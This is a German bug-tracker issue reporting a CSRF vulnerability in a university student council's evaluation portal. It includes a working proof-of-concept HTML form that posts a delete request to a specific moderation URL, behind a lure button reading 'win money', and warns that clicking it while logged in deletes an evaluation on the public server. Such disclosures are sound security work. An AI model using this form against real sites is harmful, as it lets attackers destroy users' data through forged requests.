Anfällig für CSRF (#107) · Issues · FSI Informatik / evaluationsportal

Anfällig für CSRF

CSRF ist relativ trivial möglich. Z.B gegen den testserver auf Port 5000 mit folgendem HTML:

<html>
  <body>
    <form method="POST" action="https://eva.fsi.cs.fau.de/moderation/edit/ef63f8b9abb91791aaad0552b5818848/">
      <input type="submit" name="delete" value="Gewinne GELD!!!" />
    </form>
  </body>
</html>

Vorsicht: Auf den Button klicken und eingeloggt sein löscht eine Eva vom Thorsten auf dem öffentlichen eva-server.

To upload designs, you'll need to enable LFS and have an admin enable hashed storage. More information